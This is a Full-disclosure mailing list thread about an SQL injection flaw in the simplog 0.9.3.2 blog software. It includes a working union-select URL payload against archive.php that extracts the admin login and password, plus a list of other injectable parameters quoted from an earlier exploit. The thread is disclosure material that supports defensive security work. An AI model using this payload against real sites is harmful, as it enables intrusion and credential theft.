<<< Date Index >>>     <<< Thread Index >>>

Re: [Full-disclosure] simplog 0.9.3.2 SQL injection



str0ke ,
looks like i reinvented the wheel :-)) . i didn't make any research. a
friend of mine installed the latest version of this software and voila...


str0ke wrote:
> Javor,
> 
> It seems rgod found this vulnerability back in April of 2006.
> 
> http://www.milw0rm.com/exploits/1663
> 
> <>
>  ii)
>  http://[target]/[path]/index.php?blogid=[sql]
>  http://[target]/[path]/archive.php?blogid=[sql]
>  http://[target]/[path]/archive.php?m=[sql]
>  http://[target]/[path]/archive.php?y=[sql]
> 
> /str0ke
> 
> On 1/1/07, Javor Ninov <drfrancky@xxxxxxxxxxx> wrote:
>> Afected Software:
>> simplog up to 0.9.3.2 (latest version - 12/05/2006 )
>>
>> Site:
>> http://www.simplog.org
>> Simplog provides an easy way for users to add blogging capabilities to
>> their existing websites. Simplog is written in PHP and compatible with
>> multiple databases. Simplog also features an RSS/Atom aggregator/reader.
>> Powerful, yet simple
>>
>> Vulnerability:
>> SQL Injection in archive.php
>> other files probably also affected
>>
>> Example:
>> http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
>>
>>
>> Vendor status:
>> NOT NOTIFIED
>>
>>
>> Javor Ninov aka DrFrancky
>> drfrancky shift+2 securax.org
>> http://securitydot.net/
>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>

Attachment: signature.asc
Description: OpenPGP digital signature